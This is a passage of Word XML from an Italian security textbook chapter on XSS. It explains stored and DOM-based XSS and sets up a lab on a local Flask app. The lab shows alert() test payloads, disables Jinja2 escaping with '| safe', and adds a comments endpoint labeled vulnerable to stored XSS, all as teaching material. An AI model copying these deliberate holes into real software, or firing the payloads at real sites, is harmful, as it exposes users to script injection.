    </w:p>
    <w:bookmarkEnd w:id="349"/>
    <w:bookmarkStart w:id="350" w:name="tipo-2-stored-xss"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tipo 2 — Stored XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’attaccante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">salva</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">il payload XSS sul server (nei commenti di un articolo, nei messaggi di una chat, nel proprio profilo, nelle recensioni di un prodotto).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Ogni utente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che successivamente carica la pagina che mostra quel contenuto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">esegue automaticamente il payload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ciclo di vita:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1133"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attaccante posta un commento:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;...&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1133"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il sito lo salva nel database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1133"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ogni utente che apre la pagina dei commenti carica anche lo script</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1133"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il browser di ogni utente esegue il payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1133"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Centinaia, migliaia, milioni di vittime. Tutte automaticamente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Stored XSS è di gran lunga il più pericoloso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: un singolo payload può colpire l’intera base utenti. È classificato come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">critico</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in qualunque audit di sicurezza.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="350"/>
    <w:bookmarkStart w:id="351" w:name="tipo-3-dom-based-xss-cenno"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tipo 3 — DOM-based XSS (cenno)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’iniezione avviene completamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">lato browser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, dentro JavaScript che manipola il DOM in modo non sicuro. Il server non vede nemmeno passare il payload. Esempio: pagina che fa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">document.body.innerHTML = location.hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">senza escape, e l’URL contiene</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#&lt;img src=x onerror=alert(1)&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DOM-based XSS richiede di capire bene il DOM e i sink/sources di JavaScript.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Lo vedrai al secondo anno.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="351"/>
    <w:bookmarkEnd w:id="352"/>
    <w:bookmarkStart w:id="356" w:name="X757c154af6ee46c01d1cdab5abfdef1d0394649"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="543" w:name="sec_8_4"/>
      <w:r>
        <w:t xml:space="preserve">8.4 Costruiamo il caso vulnerabile su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini</w:t>
      </w:r>
      <w:bookmarkEnd w:id="543"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Riapriamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Vogliamo dimostrare:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1134"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Reflected XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sull’endpoint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/cerca</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(il campo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">viene rimostrato nella pagina dei risultati — opportunità classica)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1134"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Uno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Stored XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">su un nuovo endpoint che permette di postare commenti sui prodotti</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="353" w:name="il-problema-con-cerca"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il problema con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/cerca</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Riguarda il template della funzione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cerca()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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&lt;h2&gt;Risultati per "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> q </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;/h2&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;a href="/"&gt;⬅ torna alla home&lt;/a&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;table border="1" cellpadding="6"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        ...</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/table&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">q, risultati</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">risultati)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Bella notizia:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Jinja2 (il motore di template di Flask) fa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">escape automatico</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del valore di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{{ q }}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Significa che se</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, Jinja2 lo trasforma in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">prima di metterlo nell’HTML. Il browser lo vede come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">testo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">da mostrare, non come tag da eseguire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Verifica:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vai su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId46">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/cerca?q=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Vedi il titolo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Risultati per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mostrato come testo.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Niente alert, niente script eseguito.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Funziona.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">💡</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Lezione importante.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Usare un framework moderno con template engine sicuro elimina</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">automaticamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la maggior parte di XSS. È una delle ragioni per cui Flask + Jinja2 (o Django, o React, o Vue) è preferibile a costruire HTML a mano.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="353"/>
    <w:bookmarkStart w:id="354" w:name="forziamo-la-vulnerabilità-per-il-lab"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Forziamo la vulnerabilità (per il lab)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per fare il lab, modifichiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cerca()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">disabilitare l’escape</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, riproducendo l’errore tipico di chi non sa cosa sta facendo. Dentro la funzione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cerca()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, sostituisci la riga</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;h2&gt;Risultati per "{{ q }}"&lt;/h2&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con:</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Risultati per "{{ q | safe }}"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">h2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il filtro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| safe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di Jinja2 dice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">considero questo valore già sicuro, non fare escape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. È una scappatoia che Jinja2 offre perché a volte serve davvero (es. mostrare HTML preformattato dell’admin).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Usata male, riapre XSS.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="354"/>
    <w:bookmarkStart w:id="355" w:name="X75ea08bb023f0e678b46ff78ae71ee6e62bc539"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aggiungiamo un endpoint di commenti (per Stored XSS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modifica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">init_db()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">aggiungendo una tabella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">commenti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(prima di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">conn.commit()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        CREATE TABLE IF NOT EXISTS commenti (</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            id INTEGER PRIMARY KEY AUTOINCREMENT,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            prodotto_id INTEGER NOT NULL,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            autore TEXT NOT NULL,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            testo TEXT NOT NULL,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            FOREIGN KEY (prodotto_id) REFERENCES prodotti(id)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aggiungi due nuovi endpoint (prima di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">if __name__ == "__main__":</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ════════════════════════════════════════════════════════════════════</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># COMMENTI SUI PRODOTTI — VULNERABILE A STORED XSS</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ════════════════════════════════════════════════════════════════════</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/prodotto/&lt;int:prodotto_id&gt;"</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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"POST"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">])</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
